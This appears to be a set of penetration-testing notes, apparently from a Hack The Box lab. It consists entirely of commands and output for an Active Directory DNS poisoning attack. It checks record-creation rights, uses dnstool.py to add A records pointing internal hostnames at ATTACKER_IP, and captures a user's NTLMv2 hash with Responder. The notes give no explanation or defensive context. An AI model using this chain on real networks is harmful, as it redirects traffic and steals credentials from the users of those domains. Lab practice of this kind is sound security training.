PS > $User = 'domain.local\user';$Pass = ConvertTo-SecureString 'password' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential($User, $Pass)
PS > Get-ADIDNSPermission -Credential $Cred -Verbose | ? {$_.Principal -eq 'NT AUTHORITY\Authenticated Users'}
Principal : NT AUTHORITY\Authenticated Users
IdentityReference : S-1-5-11
ActiveDirectoryRights : CreateChild
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
$ python3 dnstool.py -u domain.local\\username -p password --action add --record recordname --data ATTACK_IP --type A domain.local
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
# dnstool.py -u 'domain.htb\florence.ramirez' -k -r 'bitbucket.domain.htb' -d 'ATTACKER_IP' -a add -dns-ip DC_IP dc01.domain.htb
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
# Responder.py -I tun0
<-SNIP->
[HTTP] NTLMv2 Client : 10.10.11.24
[HTTP] NTLMv2 Username : domain\justin.bradley
[HTTP] NTLMv2 Hash : justin.bradley::domain:1122334455667788:EE9<-SNIP->000000000
